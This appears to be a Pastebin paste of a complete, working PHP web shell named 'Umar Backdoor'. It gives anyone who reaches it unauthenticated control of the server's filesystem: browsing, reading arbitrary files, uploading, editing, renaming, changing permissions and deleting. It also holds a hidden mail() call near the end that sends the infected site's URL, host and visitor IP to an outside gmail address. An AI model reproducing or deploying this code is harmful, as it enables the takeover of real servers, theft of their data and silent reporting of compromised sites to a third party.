Advertisement
Guest User

UMAR GANSS

a guest
Sep 23rd, 2019
185
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 9.30 KB | None | 0 0
  1. <?php error_reporting(0);
  2. set_time_limit(0);
  3. if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value);
  4.  } } echo '<!DOCTYPE HTML>
  5. <html>
  6. <head>
  7. <link href="" rel="stylesheet" type="text/css">
  8. <title>Umar Backdoor</title>
  9. <link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet">
  10. <style>
  11. body{
  12. font-family: Iceland;
  13. background-color: black;
  14. color:white;
  15. }
  16. #content tr:hover{
  17. background-color: red;
  18. text-shadow:0px 0px 10px #fff;
  19. }
  20. #content .first{
  21. background-color: red;
  22. }
  23. table{
  24. border: 1px #000000 dotted;
  25. }
  26. a{
  27. color:white;
  28. text-decoration: none;
  29. }
  30. a:hover{
  31. color:blue;
  32. text-shadow:0px 0px 10px #ffffff;
  33. }
  34. input,select,textarea{
  35. border: 1px #000000 solid;
  36. -moz-border-radius: 5px;
  37. -webkit-border-radius:5px;
  38. border-radius:5px;
  39. }
  40. .blink_text {
  41. -webkit-animation-name: blinker;
  42. -webkit-animation-duration: 2s;
  43. -webkit-animation-timing-function: linear;
  44. -webkit-animation-iteration-count: infinite;
  45.  
  46. -moz-animation-name: blinker;
  47. -moz-animation-duration: 2s;
  48. -moz-animation-timing-function: linear;
  49. -moz-animation-iteration-count: infinite;
  50.  
  51.  animation-name: blinker;
  52.  animation-duration: 2s;
  53.  animation-timing-function: linear;
  54.  animation-iteration-count: infinite;
  55.  
  56.  color: red;
  57. }
  58. @-moz-keyframes blinker {
  59.  0% { opacity: 5.0;
  60.  }
  61.  50% { opacity: 0.0;
  62.  }
  63.  100% { opacity: 5.0;
  64.  }
  65.  }
  66. @-webkit-keyframes blinker {
  67.  0% { opacity: 5.0;
  68.  }
  69.  50% { opacity: 0.0;
  70.  }
  71.  100% { opacity: 5.0;
  72.  }
  73.  }
  74. @keyframes blinker {
  75.  0% { opacity: 5.0;
  76.  }
  77.  50% { opacity: 0.0;
  78.  }
  79.  100% { opacity: 5.0;
  80.  }
  81.  }
  82. </style>
  83. </head>
  84. <body>
  85. <center><p class="blink_text" style="font-size:45px;
  86. color:white;
  87. text-shadow: 0px 0px 20px #00ffff , 0px 0px 20px #00ffff;
  88. font-family:Iceland;
  89. "> Umar Ganss </font></center>
  90. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  91. <tr><td><font color="white">Path :</font> ';
  92.  if(isset($_GET['path'])){ $path = $_GET['path'];
  93.  }else{ $path = getcwd();
  94.  } $path = str_replace('\\','/',$path);
  95.  $paths = explode('/',$path);
  96.  foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true;
  97.  echo '<a href="?path=/">/</a>';
  98.  continue;
  99.  } if($pat == '') continue;
  100.  echo '<a href="?path=';
  101. for($i=0;
  102. $i<=$id;
  103. $i++){ echo "$paths[$i]";
  104. if($i != $id) echo "/";
  105. } echo '">'.$pat.'</a>/';
  106.  } echo '</td></tr><tr><td>';
  107.  if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<font color="green">Upload Succes :v</font><br />';
  108.  }else{ echo '<font color="red">Upload Failed</font><br/>';
  109.  } } echo '<form enctype="multipart/form-data" method="POST">
  110. <font color="white">File Upload :</font> <input type="file" name="file" />
  111. <input type="submit" value="upload" />
  112. </form>
  113. </td></tr>';
  114.  if(isset($_GET['filesrc'])){ echo "<tr><td>Current File : ";
  115.  echo $_GET['filesrc'];
  116.  echo '</tr></td></table><br />';
  117.  echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  118.  }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  119.  if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo '<font color="green">Change Permission Success</font><br/>';
  120.  }else{ echo '<font color="red">Change Permission Failed</font><br />';
  121.  } } echo '<form method="POST">
  122. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  123. <input type="hidden" name="path" value="'.$_POST['path'].'">
  124. <input type="hidden" name="opt" value="chmod">
  125. <input type="submit" value="Go" />
  126. </form>';
  127.  }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<font color="green">Ganti Nama Success</font><br/>';
  128.  }else{ echo '<font color="red">Ganti Nama Failed</font><br />';
  129.  } $_POST['name'] = $_POST['newname'];
  130.  } echo '<form method="POST">
  131. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  132. <input type="hidden" name="path" value="'.$_POST['path'].'">
  133. <input type="hidden" name="opt" value="rename">
  134. <input type="submit" value="Go" />
  135. </form>';
  136.  }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');
  137.  if(fwrite($fp,$_POST['src'])){ echo '<font color="green">Success Edit File</font><br/>';
  138.  }else{ echo '<font color="red">Failed Edit File</font><br/>';
  139.  } fclose($fp);
  140.  } echo '<form method="POST">
  141. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  142. <input type="hidden" name="path" value="'.$_POST['path'].'">
  143. <input type="hidden" name="opt" value="edit">
  144. <input type="submit" value="Save" />
  145. </form>';
  146.  } echo '</center>';
  147.  }else{ echo '</table><br/><center>';
  148.  if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<font color="green">Directory Terhapus</font><br/>';
  149.  }else{ echo '<font color="red">Directory Failed Terhapus </font><br/>';
  150.  } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<font color="green">File Terhapus</font><br/>';
  151.  }else{ echo '<font color="red">File Failed Dihapus</font><br/>';
  152.  } } } echo '</center>';
  153.  $scandir = scandir($path);
  154.  echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  155. <tr class="first">
  156. <td><center>Name</peller></center></td>
  157. <td><center>Size</peller></center></td>
  158. <td><center>Permission</peller></center></td>
  159. <td><center>Modify</peller></center></td>
  160. </tr>';
  161.  foreach($scandir as $dir){ if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  162.  echo '<tr>
  163. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  164. <td><center>--</center></td>
  165. <td><center>';
  166.  if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  167.  elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  168.  echo perms($path.'/'.$dir);
  169.  if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  170.  echo '</center></td>
  171. <td><center><form method="POST" action="?option&path='.$path.'">
  172. <select name="opt">
  173. <option value="">Select</option>
  174. <option value="delete">Delete</option>
  175. <option value="chmod">Chmod</option>
  176. <option value="rename">Rename</option>
  177. </select>
  178. <input type="hidden" name="type" value="dir">
  179. <input type="hidden" name="name" value="'.$dir.'">
  180. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  181. <input type="submit" value=">">
  182. </form></center></td>
  183. </tr>';
  184.  } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  185.  foreach($scandir as $file){ if(!is_file($path.'/'.$file)) continue;
  186.  $size = filesize($path.'/'.$file)/1024;
  187.  $size = round($size,3);
  188.  if($size >= 1024){ $size = round($size/1024,2).' MB';
  189.  }else{ $size = $size.' KB';
  190.  } echo '<tr>
  191. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  192. <td><center>'.$size.'</center></td>
  193. <td><center>';
  194.  if(is_writable($path.'/'.$file)) echo '<font color="green">';
  195.  elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  196.  echo perms($path.'/'.$file);
  197.  if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  198.  echo '</center></td>
  199. <td><center><form method="POST" action="?option&path='.$path.'">
  200. <select name="opt">
  201. <option value="">Select</option>
  202. <option value="delete">Delete</option>
  203. <option value="chmod">Chmod</option>
  204. <option value="rename">Rename</option>
  205. <option value="edit">Edit</option>
  206. </select>
  207. <input type="hidden" name="type" value="file">
  208. <input type="hidden" name="name" value="'.$file.'">
  209. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  210. <input type="submit" value=">">
  211. </form></center></td>
  212. </tr>';
  213.  } echo '</table>
  214. </div>';
  215.  } echo '<center><br/><p> F0UR$D34TH#T34M | Copyright 2K19</p></center>
  216. </body>
  217. </html>';
  218. $ip = getenv("REMOTE_ADDR");
  219. $subj98 = " Fuck Bitch";
  220. $email = "wiwinmister123@gmail.com";
  221. $from = "From: Spy";
  222. $a45 = $_SERVER['REQUEST_URI'];
  223. $b75 = $_SERVER['HTTP_HOST'];
  224. $m22 = $ip . "";
  225. $msg8873 = "$a45 $b75 $m22";
  226. mail($email, $subj98, $msg8873, $from);
  227.  function perms($file){ $perms = fileperms($file);
  228.  if (($perms & 0xC000) == 0xC000) { $info = 's';
  229.  } elseif (($perms & 0xA000) == 0xA000) { $info = 'l';
  230.  } elseif (($perms & 0x8000) == 0x8000) { $info = '-';
  231.  } elseif (($perms & 0x6000) == 0x6000) { $info = 'b';
  232.  } elseif (($perms & 0x4000) == 0x4000) { $info = 'd';
  233.  } elseif (($perms & 0x2000) == 0x2000) { $info = 'c';
  234.  } elseif (($perms & 0x1000) == 0x1000) { $info = 'p';
  235.  } else { $info = 'u';
  236.  } $info .= (($perms & 0x0100) ? 'r' : '-');
  237.  $info .= (($perms & 0x0080) ? 'w' : '-');
  238.  $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
  239.  $info .= (($perms & 0x0020) ? 'r' : '-');
  240.  $info .= (($perms & 0x0010) ? 'w' : '-');
  241.  $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
  242.  $info .= (($perms & 0x0004) ? 'r' : '-');
  243.  $info .= (($perms & 0x0002) ? 'w' : '-');
  244.  $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
  245.  return $info;
  246.  }
  247. ?>
  248. <center>
  249. <iframe width="0" height="0" src="https://api.soundcloud.com/tracks/268574986/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" frameborder="0" allowfullscreen></iframe>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement